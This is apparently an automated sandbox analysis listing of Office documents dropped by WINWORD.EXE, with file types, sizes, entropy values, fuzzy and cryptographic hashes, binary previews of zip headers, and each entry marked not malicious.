                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):1649585
                              Entropy (8bit):7.875240099125746
                              Encrypted:false
                              SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                              MD5:35200E94CEB3BB7A8B34B4E93E039023
                              SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                              SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                              SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                              Malicious:false
                              Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):558035
                              Entropy (8bit):7.696653383430889
                              Encrypted:false
                              SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                              MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                              SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                              SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                              SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                              Malicious:false
                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):570901
                              Entropy (8bit):7.674434888248144
                              Encrypted:false
                              SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                              MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                              SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                              SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                              SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                              Malicious:false
                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):3078052
                              Entropy (8bit):7.954129852655753
                              Encrypted:false
                              SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                              MD5:CDF98D6B111CF35576343B962EA5EEC6
                              SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                              SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                              SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                              Malicious:false
                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):777647
                              Entropy (8bit):7.689662652914981
                              Encrypted:false
                              SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                              MD5:B30D2EF0FC261AECE90B62E9C5597379
                              SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                              SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                              SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                              Malicious:false
                              Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):924687
                              Entropy (8bit):7.824849396154325
                              Encrypted:false
                              SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                              MD5:97EEC245165F2296139EF8D4D43BBB66
                              SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                              SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                              SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                              Malicious:false
                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):966946
                              Entropy (8bit):7.8785200658952
                              Encrypted:false
                              SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                              MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                              SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                              SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                              SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                              Malicious:false
                              Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):1204049
                              Entropy (8bit):7.92476783994848
                              Encrypted:false
                              SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                              MD5:FD5BBC58056522847B3B75750603DF0C
                              SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                              SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                              SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                              Malicious:false
                              Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):486596
                              Entropy (8bit):7.668294441507828
                              Encrypted:false
                              SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                              MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                              SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                              SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                              SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                              Malicious:false
                              Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):976001
                              Entropy (8bit):7.791956689344336
                              Encrypted:false
                              SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                              MD5:9E563D44C28B9632A7CF4BD046161994
                              SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                              SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                              SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):1463634
                              Entropy (8bit):7.898382456989258
                              Encrypted:false
                              SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                              MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                              SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                              SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                              SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):2218943
                              Entropy (8bit):7.942378408801199
                              Encrypted:false
                              SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                              MD5:EE33FDA08FBF10EF6450B875717F8887
                              SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                              SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                              SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                              Malicious:false
                              Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):1750795
                              Entropy (8bit):7.892395931401988
                              Encrypted:false
                              SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                              MD5:529795E0B55926752462CBF32C14E738
                              SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                              SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                              SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):2924237
                              Entropy (8bit):7.970803022812704
                              Encrypted:false
                              SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                              MD5:5AF1581E9E055B6E323129E4B07B1A45
                              SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                              SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                              SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                              Malicious:false
                              Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):2357051
                              Entropy (8bit):7.929430745829162
                              Encrypted:false
                              SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                              MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                              SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                              SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                              SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                              Malicious:false
